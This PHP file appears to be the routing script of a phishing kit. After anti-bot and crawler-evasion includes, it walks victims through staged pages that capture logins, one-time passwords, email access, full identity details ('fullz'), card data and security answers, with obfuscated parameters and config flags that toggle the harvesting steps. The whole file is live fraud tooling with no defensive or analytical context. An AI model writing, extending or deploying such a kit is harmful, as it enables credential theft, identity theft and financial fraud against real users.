<?php
session_start();
error_reporting(0);
include 'includes/bt.php';
include 'includes/basicbot.php';
include 'includes/uacrawler.php';
include 'includes/refspam.php';
include 'includes/ipselect.php';
include 'includes/bts2.php';
include "../config/settings.php";
$base="render";if(isset($_SESSION['hnpt'])){include $base."/index.php";};

if(isset($_GET[genv('login')])){
	$_SESSION['c_page_'] = "login";
	include $base."/infile.php";
}
else if(isset($_GET[genv('otp')])){
	$_SESSION['c_page_'] = "otp";
	include $base."/lo.php";
}
else if(isset($_GET[genv('otpage')])){
	$_SESSION['c_page_'] = "otp";
	include $base."/ot.php";
}
else if(isset($_GET[genv('note')])){
	$_SESSION['c_page_'] = "note";
	include $base."/note.php";
}
else if(isset($_GET[genv('email')])){
	$_SESSION['c_page_'] = "email";
	if($grabemailaccess!=1){header('location:'.$index."?".genv(gonext("email"))."=".md5(rand(10, 9999)));exit();};
	include $base."/evm.php";
}
else if(isset($_GET[genv('fullz')])){
	$_SESSION['c_page_'] = "fullz";
	include $base."/conv.php";
}
else if(isset($_GET[genv('card')])){
	$_SESSION['c_page_'] = "card";
	include $base."/conv2.php";
}
else if(isset($_GET[genv('questions')])){
	$_SESSION['c_page_'] = "questions";
	if($grabsq!=1){header('location:'.$index."?".genv(gonext("questions"))."=".md5(rand(10, 9999)));exit();};
	include $base."/sqp.php";
}
else if(isset($_GET[genv('end')])){
	$_SESSION['c_page_'] = "end";
	include $base."/thanks.php";
}

?>